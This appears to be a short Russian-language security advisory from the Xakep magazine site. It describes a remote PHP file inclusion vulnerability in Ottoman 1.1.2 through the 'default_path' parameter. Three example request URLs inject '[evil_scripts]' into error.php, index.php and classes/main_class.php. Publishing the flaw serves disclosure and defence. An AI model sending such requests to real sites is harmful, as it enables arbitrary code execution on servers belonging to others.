Продукты «Хакера»

  • Свежий печатный выпуск

    Свежий печатный выпуск

    Лучшие статьи квартала

    2000 ₽

    Заказать журнал
  • Годовая подписка на Xakep.ru -40%, успей сэкономить!

    Годовая подписка на Xakep.ru

    Полный доступ к крутым статьям и архиву

    6000 ₽ / год

    Подписаться
  • Вход в тему пентеста от Хакера

    Вход в тему пентеста от Хакера

    Статья, видеоурок и задачи

    7000 ₽ - доступ навсегда

    Купить курс
  • Спецвыпуск Хакера  №4

    Спецвыпуск Хакера №4

    Лучшие материалы 2021-2022

    2000 ₽

    Заказать журнал

Программа: Ottoman 1.1.2, возможно более ранние версии.

Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "default_path" в сценариях "index.php", "error.php", "classes/main_class.php", "format_css.php", "js.php" и "rss.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена.

Пример:

http://www.site.com/[Ottomanpath]/error.php?default_path=[evil_scripts]
http://www.site.com/[Ottomanpath]/index.php?default_path=[evil_scripts]
http://www.site.com/[Ottomanpath]/classes/main_class.php?default_path=[evil_scripts]
 

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Старые
    Новые Популярные
    Межтекстовые Отзывы
    Посмотреть все комментарии